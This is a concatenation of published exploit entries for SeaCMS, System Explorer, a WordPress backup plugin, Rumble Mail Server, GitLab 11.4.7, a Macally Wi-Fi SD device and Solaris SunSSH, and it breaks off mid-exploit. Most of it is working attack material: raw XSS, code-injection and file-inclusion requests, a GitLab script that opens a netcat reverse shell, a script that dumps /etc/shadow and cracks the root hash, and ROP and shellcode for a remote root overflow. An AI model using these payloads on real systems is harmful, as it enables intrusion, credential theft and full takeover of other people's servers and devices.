Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://192.168.137.139
Connection: close
Referer: http://192.168.137.139/SeaCMS111/5f9js3/admin_ip.php
Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
t00ls=e54285de394c4207cd521213cebab040;
t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
Upgrade-Insecure-Requests: 1
v=0&ip=+%22%3Bphpinfo%28%29%3B%2F%2F
Vulnerable parameters:ip
payload:";phpinfo();//
# Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
# Date: 2020-10-14
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://systemexplorer.net/
# Software Link: http://systemexplorer.net/download/SystemExplorerSetup.exe
# Version: Version 7.0.0
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
# Service info:
C:\Users\m507>sc qc SystemExplorerHelpService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SystemExplorerHelpService
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : System Explorer Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
# Exploit Title: Seacms 11.1 - 'checkuser' Stored XSS
# Date: 20201212
# Exploit Author: j5s
# Vendor Homepage: https://www.seacms.net/
# Software Link: https://www.seacms.net/
# Version: 11.1
POST /SEACMS111/5f9js3/admin_safe.php?action=setting HTTP/1.1
Host: 192.168.137.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://192.168.137.139
Connection: close
Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=setting
Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
t00ls=e54285de394c4207cd521213cebab040;
t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MDoiIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
Upgrade-Insecure-Requests: 1
checkuser=%22%3E%3CsCrIpT%3Ealert%281%29%3C%2FsCrIpT%3E&checkhta=on&btnsetting=%E6%8F%90%E4%BA%A4
Vulnerable parameters: checkuser
payload:"><ScRiPt>alert(document.cookie)</ScRiPt>
# Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download
# Google Dork: intitle:("Index of" AND "wp-content/plugins/boldgrid-backup/=")
# Date: 2020-12-12
# Exploit Author: Wadeek
# Vendor Homepage: https://www.boldgrid.com/
# Software Link: https://downloads.wordpress.org/plugin/boldgrid-backup.1.14.9.zip
# Version: 1.14.9
# Tested on: BackBox Linux
1) 'readme.txt' file reveal the plugin version :
-> GET /wp-content/plugins/boldgrid-backup/readme.txt
Stable tag: 1.14.9
2) 'env-info.php' file reveals the following informations without authentication :
-> GET /wp-content/plugins/boldgrid-backup/cli/env-info.php
{
[...],
"php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x=
86_64",
"php_version":"7.X.X",
"server_addr":"127.0.0.1",
"server_name":"www.example.com",
"server_protocol":"HTTP/1.1",
"server_software":"Apache/2.X.XX (Ubuntu)",
"uid":XX,
"username":"www-data"
}
3) 'restore-info.json' file reveals the name and location of the archive containing the backups without authentication :
-> GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json
{
[...]
"filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip"
[...]
}
--trekuen-71b82944-04b2-40f7-b2e2-d8de1b7f2bb8--
# Exploit Title: Seacms 11.1 - 'file' Local File Inclusion
# Date: 20201212
# Exploit Author: j5s
# Vendor Homepage: https://www.seacms.net/
# Software Link: https://www.seacms.net/
# Version: 11.1
GET /SEACMS111/5f9js3/admin_safe.php?action=download&file=C:/windows/system.ini HTTP/1.1
Host: 192.168.137.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=scan
Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
t00ls=e54285de394c4207cd521213cebab040;
t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
Upgrade-Insecure-Requests: 1
Vulnerable parameters: file
payload:C:/windows/system.ini
# Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS
# Date: 2020-9-3
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://rumble.sf.net/
# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
# Version: Version 0.51.3135
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
# Exploit:
POST /users HTTP/1.1
Host: 127.0.0.1:2580
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
Origin: http://127.0.0.1:2580
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://127.0.0.1:2580/users
Upgrade-Insecure-Requests: 1
username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico " />
<title>RumbleLua</title>
<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div class="header_top">
<div class="header_stuff">
RumbleLua on a.com<br />
<span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
</span>
<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
</div>
</div>
<div id="contents">
<h1>RumbleLua users </h1>
<p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br />
Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br />
while regular users can only
see and edit the domains they have access to.
</p>
<table class="elements">
<tr>
<th>Create a new user:</th>
</tr>
<tr>
<td>
<form action="/users" method="post" name="makeuser">
<div style="width: 300px; text-align:right; float: left;">
<label for="username"><strong>Username:</strong></label>
<input name="username" autocomplete="off" type="text" id="username" >
<br>
<label for="password"><strong>Password:</strong></label>
<input type="password" autocomplete="off" name="password" id="password">
<br />
<label for="password"><strong>Access rights:</strong></label>
<select name="rights" size="4" style="width: 150px;" multiple="multiple">
<option value="*" style="color:#C33; font-weight:bold;">Full control</option>
<optgroup label="Domains:">
</optgroup>
</select>
</div>
<p><br /><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<input type="submit" name="submit" id="submit" value="Submit" />
</p>
</form>
</td>
</tr>
</table>
<table width="200" class="elements">
<tr>
<th>Username</th>
<th>Rights</th>
<th>Actions</th>
</tr>
<tr>
<td><img src="/icons/action_lock.png" align="absmiddle"/> <strong><font color='#006600'><script>alert("M507")</script></font></strong></td>
<td>Full control</td>
<td>
<a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>
<a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
</td>
</tr>
<tr>
<td><img src="/icons/action_lock.png" align="absmiddle"/> <strong><font color='#006600'>admin</font></strong></td>
<td>Full control</td>
<td>
<a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>
<a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
</td>
</tr>
<tr>
<td><img src="/icons/action_lock.png" align="absmiddle"/> <strong><font color='#006600'><script>alert("M5072")</script></font></strong></td>
<td>Full control</td>
<td>
<a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>
<a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
</td>
</tr>
</table>
<p> </p>
</div>
<br />
<p align="center">
Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
</p>
</body>
</html>
# Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
# Date: 2020-9-3
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://rumble.sf.net/
# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
# Version: Version 0.51.3135
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
# Exploit:
POST /settings:save HTTP/1.1
Host: 127.0.0.1:2580
Connection: keep-alive
Content-Length: 343
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:2580
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:2580/settings
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings
HTTP/1.1 302 Moved
Location: /settings:save
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico " />
<title>RumbleLua</title>
<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div class="header_top">
<div class="header_stuff">
RumbleLua on <script>alert(xss.com)</script><br />
<span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
</span>
<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
</div>
</div>
<div id="contents">
<h1>Server settings</h1>
Saving config/rumble.conf
</div>
<br />
<p align="center">
Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
</p>
</body>
</html>
# Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS
# Date: 2020-9-3
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://rumble.sf.net/
# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
# Version: Version 0.51.3135
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
# Info
The parameters `domain` and `path` are vulnerable to stored XSS.
# Exploit:
POST /domains HTTP/1.1
Host: 127.0.0.1:2580
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Origin: http://127.0.0.1:2580
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert(
Upgrade-Insecure-Requests: 1
domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico " />
<title>RumbleLua</title>
<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div class="header_top">
<div class="header_stuff">
RumbleLua on a<br />
<span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
</span>
<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
</div>
</div>
<div id="contents">
<h2>Domains</h2>
<p>
<table class="elements" border='0' cellpadding='5' cellspacing='1'><tr><th>Create a new domain</th></tr><tr><td><b><font color='darkgreen'>Domain <script>alert("XSS")</script> has been created.</font></b></td></tr><tr><td> <form action="/domains" method="post" id='create'>
<div>
<div >
<div class='form_key'>
Domain name:
</div>
<div class='form_value'>
<input type="text" name="domain"/>
</div>
</div>
<div>
<div class='form_key'>
Optional alt. storage path:
</div>
<div class='form_value'>
<input type="text" name="path"/>
</div>
</div>
<div class='form_el' id='domainsave' >
<div class='form_key'>
<input type="hidden" name="create" value="true"/>
<input class="button" type="submit" value="Save domain"/>
<input class="button" type="reset" value="Reset"/>
</div>
</div>
<br/><br/><br/><br/><br />
</div>
</form>
</td></tr></table></p>
<p> </p>
<table class="elements" border='0' cellpadding='5' cellspacing='1'>
<tr><th>Domain</th><th>Actions</th></tr>
<tr><td><img src='/icons/house.png' align='absmiddle'/> <a href='/accounts:<script>alert("XSS")</script>'><strong><script>alert("XSS")</script></strong></a></td><td><a href="/domains:<script>alert("XSS")</script>"><img title='Edit domain' src='/icons/report_edit.png' align='absmiddle'/></a> <a href="/domains?domain=<script>alert("XSS")</script>&delete=true"><img title='Delete domain' src='/icons/delete.png' align='absmiddle'/></a></td></tr></table>
</div>
<br />
<p align="center">
Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
</p>
</body>
</html>
# Exploit Title: Gitlab 11.4.7 - Remote Code Execution
# Date: 14-12-2020
# Exploit Author: Fortunato Lodari fox [at] thebrain [dot] net, foxlox
# Vendor Homepage: https://about.gitlab.com/
# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
# Tested On: Debian 10 + Apache/2.4.46 (Debian)
# Version: 11.4.7 community
import sys
import requests
import time
import random
import http.cookiejar
import os.path
from os import path
# Sign in GitLab 11.4.7 portal and get (using Burp or something other):
# authenticity_token
# authenticated cookies
# username
# specify localport and localip for reverse shell
username='aaaaaaaaaaaa'
authenticity_token='jpT/n1EoPwwWtiGu/+QKVQomofMNyqAQXY+iD2kVoRQoiQNzcFHPAj2+M4pyblKo/7UkClKW8jvp51Aw2qzs7g=='
cookie = '_gitlab_session=c942527505cc0580c026610a1799b811; sidebar_collapsed=false'
localport='1234'
localip='192.168.0.114'
url = "http://192.168.0.130:5080"
proxies = { "http": "http://localhost:8080" }
def deb(str):
print("Debug => "+str)
def create_payload(authenticity_token,prgname,namespace_id,localip,localport,username):
return {'utf8':'✓','authenticity_token':authenticity_token,'project[ci_cd_only]':'false','project[name]':prgname,'project[namespace_id]':namespace_id,'project[path]':prgname,'project[description]':prgname,'project[visibility_level]':'20','':'project[initialize_with_readme]','project[import_url]':'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\'|nc '+localip+' '+localport+' -e /bin/sh\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"\n exec\n exec\n exec\n/'+username+'/'+prgname+'.git'}
import string
def random_string(length):
return ''.join(random.choice(string.ascii_letters) for m in range(length))
def init(username,cookie,authenticity_token,localport,localip):
from bs4 import BeautifulSoup
import re
import urllib.parse
deb("Token: "+authenticity_token)
deb("Cookie: "+cookie)
session=requests.Session()
headers = {'user-agent':'Moana Browser 1.0','Cookie':cookie,'Content-Type':'application/x-www-form-urlencoded','DNT':'1','Upgrade-Insecure-Requests':'1'}
r=session.get(url+'/projects/new',headers=headers,allow_redirects=True)
soup = BeautifulSoup(r.content,"lxml")
nsid = soup.findAll('input', {"id": "project_namespace_id"})
namespace_id=nsid[0]['value'];
deb("Namespace ID: "+namespace_id)
prgname=random_string(8)
newpayload=create_payload(authenticity_token,prgname,namespace_id,localip,localport,username)
newpayload=urllib.parse.urlencode(newpayload)
deb("Payload encoded: "+newpayload)
r=session.post(url+'/projects',newpayload,headers=headers,allow_redirects=False)
os.system("nc -nvlp "+localport)
init(username,cookie,authenticity_token,localport,localip)
# Exploit Title: Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
# Date: 03.12.2020
# Exploit Author: Maximilian Barz and Daniel Schwendner
# Vendor Homepage: https://us.macally.com/products/wifisd2
# Version: 2.000.010
# Tested on: Kali Linux 5.7.0-kali1-amd64
# CVE : CVE-2020-29669
# Reference: https://github.com/S1lkys/CVE-2020-29669/
#!/usr/bin/env/python3
import requests
import telnetlib
import os
import sys
import re
banner = '''\033[94m
██████ ▄▄▄█████▓ ▄▄▄ ██▀███ ▄▄▄▄ █ ██ ██▀███ ██████ ▄▄▄█████▓
▒██ ▒ ▓ ██▒ ▓▒▒████▄ ▓██ ▒ ██▒▓█████▄ ██ ▓██▒▓██ ▒ ██▒▒██ ▒ ▓ ██▒ ▓▒
░ ▓██▄ ▒ ▓██░ ▒░▒██ ▀█▄ ▓██ ░▄█ ▒▒██▒ ▄██▓██ ▒██░▓██ ░▄█ ▒░ ▓██▄ ▒ ▓██░ ▒░
▒ ██▒░ ▓██▓ ░ ░██▄▄▄▄██ ▒██▀▀█▄ ▒██░█▀ ▓▓█ ░██░▒██▀▀█▄ ▒ ██▒░ ▓██▓ ░
▒██████▒▒ ▒██▒ ░ ▓█ ▓██▒░██▓ ▒██▒░▓█ ▀█▓▒▒█████▓ ░██▓ ▒██▒▒██████▒▒ ▒██▒ ░
▒ ▒▓▒ ▒ ░ ▒ ░░ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░▒▓███▀▒░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░ ▒ ░░
░ ░▒ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░▒░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░░ ░▒ ░ ░ ░
░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░
░
\x1b[0m
Macally WIFISD2 Guest to Root Privilege Escalation for CVE-2020-29669 by Maximilian Barz and Daniel Schwendner
'''
def main():
if(len(sys.argv) < 2):
print(banner)
print("Usage: %s <host> " % sys.argv[0])
print("Eg: %s 1.2.3.4 " % sys.argv[0])
return
rhost = sys.argv[1]
session = requests.Session()
guest_creds = "guest_pass"
admin_pass_to_set = "Silky123"
def send_requests():
url = "http://"+rhost+"/protocol.csp?function=set"
payload = {'fname':'security','opt':'pwdchk','name':'guest','pwd1':guest_creds,'function':'set'}
headers = {
'Host': rhost,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://'+rhost+'/index.html',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '65',
'Connection': 'close',
'Cache-Control': 'no-cache',
}
r= session.post(url, payload, headers)
if (b"<errno>0</errno>" in r.content):
print("\033[92m[+] Authentication successful\x1b[0m")
print("\t"+str(session.cookies.get_dict()))
else:
print("\033[91m[+] Authentication failed.\x1b[0m")
sys.exit()
url = "http://"+rhost+"/protocol.csp?fname=security&function=set"
payload = {'name':'admin','opt':'pwdmod','pwd1':admin_pass_to_set,'pwd2':admin_pass_to_set}
headers = {
'Host': rhost,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://'+rhost+'/app/user/guest.html',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '49',
'Connection': 'close',
'Cache-Control': 'no-cache',
}
d = session.post(url, payload, headers)
if (b"<errno>0</errno>" in d.content):
print("\033[92m[+] Admin Password changed to: "+admin_pass_to_set+"\x1b[0m")
telnet_grep_root_hash()
#print("[+] Spawning Admin Shell")
#telnet_login()
else:
print("\033[91m[+] Admin Password change failed\x1b[0m")
sys.exit()
def telnet_grep_root_hash():
user = "admin"
tn = telnetlib.Telnet(rhost)
tn.read_until(b"login: ")
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"Password: ")
tn.write(admin_pass_to_set.encode('ascii') + b"\n")
print("\033[92m[+] Dumping Hashes:\x1b[0m")
tn.write(b"cat /etc/shadow\n\r")
tn.write(b"exit\n")
output = tn.read_all().decode('ascii')
L = output.split('\n')
for hash in L:
if ":" in hash:
print("\t"+hash)
print("\n\r")
for hash in L:
if "root" in hash:
print("\033[92m[+] Root Hash found, trying to crack it..\x1b[0m")
print("\t"+hash) #root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::
f = open("root_hash","w+")
f.write(hash)
f.close()
crack_root_hash();
def crack_root_hash():
f = open("root_hash", "r")
hash = f.read()
if ("root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::" in hash):
print("\033[92mRoot Password: 20080826\x1b[0m\n")
telnet_login()
else:
os.system("hashcat -a 0 -m 500 root_hash /root/tools/routersploit/routersploit/resources/wordlists/passwords.txt") #https://github.com/threat9/routersploit/blob/master/routersploit/resources/wordlists/passwords.txt
def telnet_login():
print("\033[92m[+] Spawning Rootshell\x1b[0m")
user = "root"
root_password="20080826"
tn = telnetlib.Telnet(rhost)
tn.read_until(b"login: ")
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"Password: ")
tn.write(root_password.encode('ascii') + b"\n")
tn.interact()
print(banner)
send_requests()
if(__name__ == '__main__'):
main()
# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root
# Exploit Author: Hacker Fantastic
# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris11-overview.html
# Version: 11
# Tested on: SunOS solaris 5.11 11.0
/* SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
* ====================================================================
* Makefile
* all: hfsunsshdx
*
* hfsunsshdx: main.c
* gcc main.c -o hfsunsshdx -lssh2
*
* clean:
* rm -rf hfsunsshdx
* rm -rf core.*
*
* A trivial to reach stack-based buffer overflow is present in libpam on
* Solaris. The vulnerable code exists in pam_framework.c parse_user_name()
* which allocates a fixed size buffer of 512 bytes on the stack and parses
* usernames into the buffer via modules (authtok_get) without bounds checks.
* This issue can be reached remotely pre-authentication via SunSSH when
* "keyboard-interactive" is enabled to use PAM based authentication. The
* vulnerability was discovered being actively exploited by FireEye in the
* wild and is part of an APT toolkit called "EVILSUN". The vulnerability
* is present in both SPARC/x86 versions of Solaris & others (eg. illumos).
* This exploit uses ROP gadgets to disable nxstack through mprotect on x86
* and a helper shellcode stub. The configuration in a default Solaris
* install is vulnerable. The exploit makes use of libssh2 and tested on
* Solaris 10 through 11.0. Solaris 9 does not ship with a vulnerable
* SunSSH implementation and versions later than 11.1 have updated SunSSH
* code that prevents the issue being triggered.
*
* e.g.
* ./hfsunsshdx -s 192.168.11.220 -t 0 -x 2
* [+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
* [-] chosen target 'Solaris 11 11/11 11.0 Sun_SSH_2.0 x86'
* [-] using shellcode 'Solaris 11.0 x86 bindshell tcp port 9999' 193 bytes
* [+] ssh host fingerprint: 01bc34fe8092e051716b91fd88eed210db2df49e
* [+] entering keyboard-interactive authentication.
* [-] number of prompts: 1
* [-] prompt 0 from server: 'Please enter user name: '
* [-] shellcode length 193 bytes
* [-] rop chain length 68
* [-] exploit buffer length 580
* [-] sending exploit magic buffer... wait
* [+] exploit success, handling payload...
* [-] connected.. enjoy :)
* SunOS solaris 5.11 11.0 i86pc i386 i86pc
* 6:49pm up 53 min(s), 1 user, load average: 0.01, 0.01, 0.01
* helpdesk console Nov 27 17:57
* uid=0(root) gid=0(root)
*
* -- Hacker Fantastic (https://hacker.house)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <ctype.h>
#include <getopt.h>
#include <time.h>
#include <signal.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/select.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <libssh2.h>
int sd = -1;
int oldsd = -1;
int ishell = -1;
char* buf;
char* payload;
char* retaddr;
struct sockaddr_in sain;
struct target {
char* name;
char* ropchain;
};
struct shellcode {
char* name;
char* shellcode;
};
void spawn_shell(int);
void bindshell_setup(short);
void on_alarm(int);
void on_interupt(int);
void prepare_payload();
const int targetno = 5;
struct target targets[] = {
{"Solaris 11 11/11 11.0 Sun_SSH_2.0 x86",
"\x41\x42\x43\x44" // %ebx
"\x45\x46\x47\x48" // %esi
"\x50\x51\x52\x53" // %ebp
"\xa7\x0e\x06\x08" // pop %ecx, pop %edx, pop %ebp
"\x9c\x3e\x04\x08" // ptr to (0x?, 0x?, 0x8044cf0, 0x7)
"\x01\x01\x04\x08" // %edx unused, must be writeable addr
"\x41\x42\x43\x44" // %ebp unused var
"\x93\xdb\xc8\xfe" // pop %edx ; ret
"\x01\x30\x04\x08" // ptr to 0x08043001 mprotect arg
"\x1a\xe7\x0b\xfe" // dec %edx ; ret
